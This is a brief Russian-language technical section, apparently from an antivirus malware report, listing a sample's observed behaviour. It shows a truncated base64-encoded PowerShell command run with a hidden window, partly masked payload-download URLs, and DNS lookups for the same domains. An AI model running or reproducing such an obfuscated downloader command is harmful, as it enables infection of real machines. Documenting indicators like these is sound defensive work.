Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAFMARwBLAEsAeABkAG0APQAnAEgASQBMAFAARABuAHkAcQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAFUAUgBJAGAAVABZAHAAUgBvAFQAbwBjAG8AbAAiACAAPQAgAC...
- http://lo###izlee.com/wp-admin/Z6G5ZQ/
- http://www.io####lectvbc.com/z/1Cd/
- http://ba###rmedia.com/wp-content/Kn/
- http://si######ararestaurante.net/zodsm/iE440/
- DNS ASK zo####trends.com
- DNS ASK lo###izlee.com
- DNS ASK io####lectvbc.com
- DNS ASK ba###rmedia.com
- DNS ASK si######ararestaurante.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAFMARwBLAEsAeABkAG0APQAnAEgASQBMAFAARABuAHkAcQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAFUAUgBJAGAAVABZAHAAUgBvAFQAbwBjAG8AbAAiACAAPQAgAC...' (со скрытым окном)